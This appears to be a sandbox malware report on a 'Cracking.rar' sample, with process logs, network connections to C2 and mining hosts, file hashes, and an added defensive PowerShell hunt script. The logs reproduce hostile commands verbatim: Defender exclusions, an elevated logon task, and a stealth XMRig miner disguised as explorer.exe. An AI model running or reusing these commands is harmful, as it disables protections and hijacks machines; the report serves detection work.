"C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & exit & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\IXP000.TMP'
C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.pool.minergate.com:45700 [email protected] --pass= --cpu-max-threads-hint=20 --donate-level=5 --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\updates.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\updates.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & exit & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\IXP001.TMP'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "updates" /tr '"C:\Users\Admin\AppData\Local\Temp\updates.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "updates" /tr '"C:\Users\Admin\AppData\Local\Temp\updates.exe"'
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
C:\Users\Admin\AppData\Local\Temp\updates.exe
"C:\Users\Admin\AppData\Local\Temp\updates.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & exit & exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & exit & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\IXP001.TMP'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\IXP001.TMP'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
C:\Users\Admin\Desktop\Cracking\TSP\TSP.EXE
"C:\Users\Admin\Desktop\Cracking\TSP\TSP.EXE"
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TSPDOR~1.EXE
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TSPDOR~1.EXE
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "updates" /tr '"C:\Users\Admin\AppData\Local\Temp\updates.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "updates" /tr '"C:\Users\Admin\AppData\Local\Temp\updates.exe"'
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & exit & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\IXP001.TMP'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Generated1.txt
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\updates.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\updates.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & exit & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\IXP002.TMP'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "updates" /tr '"C:\Users\Admin\AppData\Local\Temp\updates.exe"' & exit
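The process list above records the full post-exploitation chain: the IExpress self-extractor (the IXP00n.TMP directories are its extraction folders) drops TSPDOR~1.EXE and updates.exe, Defender exclusions are added for %UserProfile%, %AppData%, %Temp% and the dropped binaries via Add-MpPreference, an onlogon scheduled task named "updates" with /rl highest re-launches %Temp%\updates.exe, netsh opens the firewall for RegAsm.exe (the host process the njRAT payload is injected into), cmstp.exe /au is run with a temporary INF and then killed with taskkill, and a copy of explorer.exe in %AppData%\Microsoft\Windows\Templates runs XMRig against xmr.pool.minergate.com:45700 with --cinit-stealth. The following hunt script is an added example and is not part of the sandbox report or the sample; it checks a Windows host for those same artifacts. It assumes an elevated PowerShell session with the Defender, ScheduledTasks, NetSecurity and DnsClient modules available, and it re-expresses the report's C:\Users\Admin paths through environment variables so it applies to whichever user is logged on.

```powershell
# Added hunt script (not from the report): looks for the persistence and
# defense-evasion artifacts recorded in the Cracking.rar detonation.
# Run elevated; Get-MpPreference requires the Defender module.

$findings = [System.Collections.Generic.List[object]]::new()
function Add-Finding([string]$Category, [string]$Detail) {
    $findings.Add([pscustomobject]@{ Category = $Category; Detail = $Detail })
}

# 1. Defender exclusions covering user-writable directories. The sample excludes
#    %UserProfile%, %AppData%, %Temp% and its own dropped executables.
$userWritable = @($env:USERPROFILE, $env:APPDATA, $env:TEMP, $env:LOCALAPPDATA)
try {
    foreach ($ex in (Get-MpPreference).ExclusionPath) {
        if ($userWritable | Where-Object { $ex -like "$_*" }) {
            Add-Finding 'DefenderExclusion' $ex
        }
    }
} catch { Add-Finding 'Error' "Get-MpPreference failed: $_" }

# 2. Scheduled tasks named 'updates' or whose action runs out of %Temp%
#    (the sample creates: schtasks /create /sc onlogon /rl highest /tn "updates").
foreach ($task in Get-ScheduledTask -ErrorAction SilentlyContinue) {
    foreach ($action in $task.Actions) {
        if ($task.TaskName -eq 'updates' -or $action.Execute -match '\\AppData\\Local\\Temp\\') {
            Add-Finding 'ScheduledTask' "$($task.TaskPath)$($task.TaskName) -> $($action.Execute) $($action.Arguments)"
        }
    }
}

# 3. Firewall allow rule for RegAsm.exe, added by the legacy
#    'netsh firewall add allowedprogram' command seen in the process list.
Get-NetFirewallApplicationFilter -ErrorAction SilentlyContinue |
    Where-Object { $_.Program -like '*\RegAsm.exe' } |
    Get-NetFirewallRule |
    ForEach-Object { Add-Finding 'FirewallRule' "$($_.DisplayName) [$($_.Direction)/$($_.Action)]" }

# 4. Dropped binaries at the paths the report records (as executed or as
#    exclusion targets), plus leftover IExpress extraction directories.
$dropped = @(
    "$env:APPDATA\Microsoft\Windows\Templates\svchost.exe",
    "$env:APPDATA\Microsoft\Windows\Templates\explorer.exe",
    "$env:APPDATA\Microsoft\Windows\version.exe",
    "$env:APPDATA\Microsoft\Windows\explorer.exe",
    "$env:APPDATA\Microsoft\Windows\OneDrive.exe",
    "$env:APPDATA\Microsoft\Windows\Cortana.exe",
    "$env:APPDATA\Microsoft\Libs\sihost64.exe",
    "$env:TEMP\updates.exe",
    "$env:TEMP\Setup.exe"
)
foreach ($p in $dropped) { if (Test-Path -LiteralPath $p) { Add-Finding 'DroppedFile' $p } }
Get-ChildItem -Path $env:TEMP -Directory -Filter 'IXP*.TMP' -ErrorAction SilentlyContinue |
    ForEach-Object { Add-Finding 'ExtractDir' $_.FullName }

# 5. System binary names running from outside %windir% (masquerading copies of
#    explorer.exe / svchost.exe) and any process carrying XMRig-style arguments.
$systemNames = 'explorer.exe', 'svchost.exe', 'sihost.exe', 'sihost64.exe'
foreach ($proc in Get-CimInstance Win32_Process) {
    $exe = $proc.ExecutablePath
    if ($exe -and ($systemNames -contains $proc.Name) -and ($exe -notlike "$env:windir\*")) {
        Add-Finding 'MasqueradingProcess' "$($proc.ProcessId) $exe"
    }
    if ($proc.CommandLine -match '--url=|--donate-level=|--cinit-stealth') {
        Add-Finding 'MinerCommandLine' "$($proc.ProcessId) $($proc.CommandLine)"
    }
}

# 6. Run keys pointing into user-writable locations.
foreach ($hive in 'HKCU:', 'HKLM:') {
    $key = "$hive\Software\Microsoft\Windows\CurrentVersion\Run"
    $props = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
    if ($props) {
        foreach ($name in $props.PSObject.Properties.Name) {
            if ($name -like 'PS*') { continue }   # skip provider metadata properties
            $val = [string]$props.$name
            if ($val -match 'AppData|\\Temp\\|\\Users\\') { Add-Finding 'RunKey' "$key\$name = $val" }
        }
    }
}

# 7. DNS cache entries for the C2, staging and mining-pool hosts in the Network table.
$iocDomains = 'xcpanel.hackcrack.io', 'xmr.pool.minergate.com',
              'amazonhost.thedreamsop.com', '24-06-2022-8080.blogspot.com'
Get-DnsClientCache -ErrorAction SilentlyContinue |
    Where-Object { $iocDomains -contains $_.Entry } |
    ForEach-Object { Add-Finding 'DnsCache' "$($_.Entry) -> $($_.Data)" }

$findings | Sort-Object Category | Format-Table -AutoSize
```

Any DefenderExclusion hit on a whole profile directory should be treated as a compromise indicator on its own, since the exclusion outlives the processes that created it; remove it with Remove-MpPreference -ExclusionPath only after the dropped files and the "updates" task have been collected for analysis.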
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | assets.msn.com | udp |
| GB | 95.101.143.155:443 | assets.msn.com | tcp |
| US | 8.8.8.8:53 | 254.177.238.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 155.143.101.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.168.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| NL | 142.251.36.46:443 | clients2.google.com | udp |
| NL | 142.251.36.46:443 | clients2.google.com | tcp |
| N/A | 224.0.0.251:5353 | | udp |
| US | 8.8.8.8:53 | 46.36.251.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.81.21.72.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| NL | 142.251.36.10:443 | content-autofill.googleapis.com | tcp |
| US | 8.8.8.8:53 | 206.23.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.36.251.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.win-rar.com | udp |
| DE | 51.195.68.163:443 | www.win-rar.com | tcp |
| DE | 51.195.68.163:443 | www.win-rar.com | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| US | 2.18.121.68:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | 163.68.195.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.121.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| DE | 51.195.68.163:443 | www.win-rar.com | tcp |
| NL | 142.251.36.10:443 | content-autofill.googleapis.com | udp |
| DE | 51.195.68.163:443 | www.win-rar.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | notifier.win-rar.com | udp |
| DE | 51.195.68.173:443 | notifier.win-rar.com | tcp |
| US | 8.8.8.8:53 | 173.68.195.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 142.33.222.23.in-addr.arpa | udp |
| DE | 51.195.68.173:443 | notifier.win-rar.com | tcp |
| US | 8.8.8.8:53 | 35.36.251.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | amazonhost.thedreamsop.com | udp |
| US | 107.180.2.24:80 | amazonhost.thedreamsop.com | tcp |
| US | 107.180.2.24:80 | amazonhost.thedreamsop.com | tcp |
| US | 8.8.8.8:53 | 24.2.180.107.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24-06-2022-8080.blogspot.com | udp |
| NL | 142.251.36.33:443 | 24-06-2022-8080.blogspot.com | tcp |
| US | 8.8.8.8:53 | 33.36.251.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xcpanel.hackcrack.io | udp |
| US | 209.25.141.181:41642 | xcpanel.hackcrack.io | tcp |
| US | 209.25.141.181:41642 | xcpanel.hackcrack.io | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.67.143:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 143.67.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xmr.pool.minergate.com | udp |
| DE | 49.12.80.38:45700 | xmr.pool.minergate.com | tcp |
| US | 209.25.141.181:41642 | xcpanel.hackcrack.io | tcp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| DE | 49.12.80.38:45700 | xmr.pool.minergate.com | tcp |
| US | 209.25.141.181:41642 | xcpanel.hackcrack.io | tcp |
| US | 209.25.141.181:41642 | xcpanel.hackcrack.io | tcp |
| US | 8.8.8.8:53 | xmr.pool.minergate.com | udp |
| DE | 49.12.80.38:45700 | xmr.pool.minergate.com | tcp |
| US | 209.25.141.181:41642 | xcpanel.hackcrack.io | tcp |
| DE | 49.12.80.38:45700 | xmr.pool.minergate.com | tcp |
| US | 209.25.141.181:41642 | xcpanel.hackcrack.io | tcp |
| DE | 49.12.80.38:45700 | xmr.pool.minergate.com | tcp |
| US | 209.25.141.181:41642 | xcpanel.hackcrack.io | tcp |
| DE | 49.12.80.39:45700 | xmr.pool.minergate.com | tcp |
| US | 209.25.141.181:41642 | xcpanel.hackcrack.io | tcp |
| US | 8.8.8.8:53 | xmr.pool.minergate.com | udp |
| DE | 49.12.80.38:45700 | xmr.pool.minergate.com | tcp |
| US | 209.25.141.181:41642 | xcpanel.hackcrack.io | tcp |
| US | 8.8.8.8:53 | assets.msn.com | udp |
| GB | 95.101.143.128:443 | assets.msn.com | tcp |
| US | 8.8.8.8:53 | 128.143.101.95.in-addr.arpa | udp |
| DE | 49.12.80.38:45700 | xmr.pool.minergate.com | tcp |
| US | 209.25.141.181:41642 | xcpanel.hackcrack.io | tcp |
| DE | 49.12.80.40:45700 | xmr.pool.minergate.com | tcp |
| US | 8.8.8.8:53 | 40.80.12.49.in-addr.arpa | udp |
| US | 209.25.141.181:41642 | xcpanel.hackcrack.io | tcp |
| DE | 49.12.80.38:45700 | xmr.pool.minergate.com | tcp |
| US | 8.8.8.8:53 | xcpanel.hackcrack.io | udp |
| US | 209.25.141.181:41642 | xcpanel.hackcrack.io | tcp |
| US | 8.8.8.8:53 | xmr.pool.minergate.com | udp |
| DE | 49.12.80.38:45700 | xmr.pool.minergate.com | tcp |
| US | 209.25.141.181:41642 | xcpanel.hackcrack.io | tcp |
| DE | 49.12.80.38:45700 | xmr.pool.minergate.com | tcp |
| US | 209.25.141.181:41642 | xcpanel.hackcrack.io | tcp |
| US | 8.8.8.8:53 | xmr.pool.minergate.com | udp |
| DE | 49.12.80.40:45700 | xmr.pool.minergate.com | tcp |
| US | 209.25.141.181:41642 | xcpanel.hackcrack.io | tcp |
| DE | 49.12.80.38:45700 | xmr.pool.minergate.com | tcp |
| US | 209.25.141.181:41642 | xcpanel.hackcrack.io | tcp |
| DE | 49.12.80.39:45700 | xmr.pool.minergate.com | tcp |
Files
C:\Users\Admin\Downloads\Cracking.rar
| MD5 | 024c45e8caedf9c6968db1f862621c29 |
| SHA1 | 7aa7c72d99aad341ad6b85b36f17e745548808d3 |
| SHA256 | 88362564f1f82fd3b8d520c5aa4925f62781ef58d4c5493b3d98e5c1c71210fd |
| SHA512 | 8a34c806982ac65290ebbbb6f1994647e21696a0572378ef1e0db83915addabd64ba5e3c43fc64c62f65865c114eeb098b3380f49c0380cb79599cbc9c9f9bc1 |
\??\pipe\crashpad_1872_KJQTTMTRYYICMEEI
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json
| MD5 | 99914b932bd37a50b983c5e7c90ae93b |
| SHA1 | bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f |
| SHA256 | 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a |
| SHA512 | 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | f1f0fdf8b8140565bfcd2c4fe595e692 |
| SHA1 | 861e6dd91c9de132ee99d6834ee4f64c9e790019 |
| SHA256 | 4e58dc35111c9075d203001600b09e8a51265a5421adfd006789c3ca967b7706 |
| SHA512 | e7009cbcad3fbe4abb7bf564250b1b308148caead14bd2095feda30f50fe32ce9647975136b93c381e64b0b7bb98d944f98da0b7e28ef7188013ef069f683f20 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | bff67454fc0fe4a96682b146e53ba39f |
| SHA1 | 3044d9a409840a708a2f2612a46d7597254480dd |
| SHA256 | de1c0d7f6106a22067f74543c58624f99ca555165308a37afea4632abed376e7 |
| SHA512 | 7cace92761dcc634a4192af7667cd601c0af25b86cbdead66b941d405ba62afefe8aff4856b2bc65cf3ad1e0defcb76bb8a4b335e1847743a43663870718a7ba |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | d3fa98d8c9571b288fa16077f7bad749 |
| SHA1 | 406d1c25208d89e1ac3d7b4b8d0e5a31a1e62efc |
| SHA256 | fd3018132e9501132f484a1648a53a10c3984e12b3372167a824d48b6ba7d61f |
| SHA512 | ed5e9a164134663a35c4e0908ea5bf8f6568ff8cdf1cc2bfa7cff50f9780a0e573eb471795aef8d70b9762175a30d356cf0c66a573159527324201fcb7dce780 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | 691f84ad579f7207ea758b1f50f50888 |
| SHA1 | a45fa29a8b22a5ad121e7fba854196e2e2ea7d79 |
| SHA256 | 78b70ad43111a1ef5cda46a3518cc65932fcd697f669416cb62f6d5eda335d85 |
| SHA512 | ab163a8f543cab7efa701af54e29950ab21dc4ee03ab6ab6bdb7cf129cf2b350d09189aeac3b26d5d9329472d6b97fc33e9f944813469f63351d6f3728186163 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 23a1f6fbacf84e43e7a8420de719f93c |
| SHA1 | 0c4ba5e4650c87492676cdc2de4754bf914f0a2c |
| SHA256 | 2035fc0f5d412d3442e2e94383c45bbda1dfcde22f8d04d0670601d16a1eca99 |
| SHA512 | 0dbe54b934137851925fedbaa87347f43865a58db8b46a1f643ba10a2bf14c6ece4a0901a49744689bc26089b386441d774cc1b11beea35accc6ac1497662136 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 4cd47068248b9799137f457c3b44c534 |
| SHA1 | f841c46843ebcb9b5ccfd2471e3a2940118df0cd |
| SHA256 | de16e880170ed2f0f5d59d8cc06c0dbb3a35ea9ba138dec8d0ae164fcdc448f1 |
| SHA512 | 50f7f8ce33370bf32352af33caea34d526c0f67a1caeb06988a07904de00b565091145f9bae3b1b920e4bd820f76cbe54262ef7f59293a199cae1c865d722d03 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
| MD5 | 1567352ee815902b77cb76c114d54c1c |
| SHA1 | 6b9085c86389b74ec04ce66097b09c1535571e3d |
| SHA256 | 87fe2882a190bdb12b5122d4470751fd34f5a2208597067a19fd98e8944ec018 |
| SHA512 | ef7b04efc7eb0a51bbd58ab4e28763d3f2dbb79b3c8bb7db6a102384a42312f1d816c50127fb0ed01c4429a56084639d116587feb2084f51a211b69e792ef8e5 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe58ed39.TMP
| MD5 | df27346f3ea1e3751e1268e0117cde87 |
| SHA1 | 674ccebd54dda92ee629267a4f5486157ec51070 |
| SHA256 | 62f20ea9afd7cccafc753c8232f9f9e7277207fb5fb8e90c45c896be1d76e233 |
| SHA512 | 3ea4f57b592e7008c859f286a08eabc2288fde02c1923d18a23aaa77ff6b06d4835f32392d9e7284b5b563844d6cb2ce506e79518d23297a7bc6add338698d94 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms
| MD5 | 2c3289ce95918e4b8164108586c9974c |
| SHA1 | 6806ab1565a6b46628256bc97265a9fa13b0a9b7 |
| SHA256 | 212757651c19c3f6641eff85ff562ebfb2e4bf9c93b8d2e9a54b2cda8945e2b6 |
| SHA512 | ff12ac12738654ed196f12dbfd436f0b197e19e4f72159a25959be31f41f63819a684f77297480f8d5b2086ead03880030deb102f28584119fb8103a5191f86a |
C:\Users\Admin\Downloads\winrar-x64-622.exe
| MD5 | 8a3faa499854ea7ff1a7ea5dbfdfccfb |
| SHA1 | e0c4e5f7e08207319637c963c439e60735939dec |
| SHA256 | e5e9f54a55ad4b936adaed4cca5b4d29bd6f308f1a0136a7e3c0f5fb234e7fff |
| SHA512 | 4c7474353dd64e1a1568b93e17be3f2f0eaf24b7d520339c033f46a517b0e048e88bda1b5d5bcfe62353930d8d76a7037ec6200882df8afc310322a5d5fceb25 |
C:\Users\Admin\Downloads\winrar-x64-622.exe
| MD5 | 8a3faa499854ea7ff1a7ea5dbfdfccfb |
| SHA1 | e0c4e5f7e08207319637c963c439e60735939dec |
| SHA256 | e5e9f54a55ad4b936adaed4cca5b4d29bd6f308f1a0136a7e3c0f5fb234e7fff |
| SHA512 | 4c7474353dd64e1a1568b93e17be3f2f0eaf24b7d520339c033f46a517b0e048e88bda1b5d5bcfe62353930d8d76a7037ec6200882df8afc310322a5d5fceb25 |
C:\Users\Admin\Downloads\winrar-x64-622.exe
| MD5 | 8a3faa499854ea7ff1a7ea5dbfdfccfb |
| SHA1 | e0c4e5f7e08207319637c963c439e60735939dec |
| SHA256 | e5e9f54a55ad4b936adaed4cca5b4d29bd6f308f1a0136a7e3c0f5fb234e7fff |
| SHA512 | 4c7474353dd64e1a1568b93e17be3f2f0eaf24b7d520339c033f46a517b0e048e88bda1b5d5bcfe62353930d8d76a7037ec6200882df8afc310322a5d5fceb25 |
C:\Program Files\WinRAR\Uninstall.exe
| MD5 | 36297a3a577f3dcc095c11e5d76ede24 |
| SHA1 | ace587f83fb852d3cc9509386d7682f11235b797 |
| SHA256 | f7070f4bb071cd497bf3067291657a9a23aab1ca9d0ab3f94721ef13139ce11b |
| SHA512 | f7a3937f9ffb5ebaac95bddc4163436decdd6512f33675e3709227a1a7762588a071143140ed6bb2a143b006931e5c8b49486647800f0de2e5c355e480f57631 |
C:\Program Files\WinRAR\uninstall.exe
| MD5 | 36297a3a577f3dcc095c11e5d76ede24 |
| SHA1 | ace587f83fb852d3cc9509386d7682f11235b797 |
| SHA256 | f7070f4bb071cd497bf3067291657a9a23aab1ca9d0ab3f94721ef13139ce11b |
| SHA512 | f7a3937f9ffb5ebaac95bddc4163436decdd6512f33675e3709227a1a7762588a071143140ed6bb2a143b006931e5c8b49486647800f0de2e5c355e480f57631 |
C:\Program Files\WinRAR\Uninstall.exe
| MD5 | 36297a3a577f3dcc095c11e5d76ede24 |
| SHA1 | ace587f83fb852d3cc9509386d7682f11235b797 |
| SHA256 | f7070f4bb071cd497bf3067291657a9a23aab1ca9d0ab3f94721ef13139ce11b |
| SHA512 | f7a3937f9ffb5ebaac95bddc4163436decdd6512f33675e3709227a1a7762588a071143140ed6bb2a143b006931e5c8b49486647800f0de2e5c355e480f57631 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 03edc1de158eadd2f54563bc6b52bb4b |
| SHA1 | 1ffd98fbc7cbd54c095831253b5123b3df0b172e |
| SHA256 | 1cade33a66db89fc2d71322cf7d350a1c0b4cb1281d22fa9442bf78ed470d82c |
| SHA512 | 658094df251fee7ecf430e5d43d775fcd8d161298f0a337a4716a67ac925695bdd28217a2a57913be061a71040e1bdf3deaa3f740594c789a51316a3e9a0e4dc |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\IJIZWXVF\suggestions[1].en-US
| MD5 | 5a34cb996293fde2cb7a4ac89587393a |
| SHA1 | 3c96c993500690d1a77873cd62bc639b3a10653f |
| SHA256 | c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad |
| SHA512 | e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | ae1bfbd6e0a3b0f03ab56beec65f3d35 |
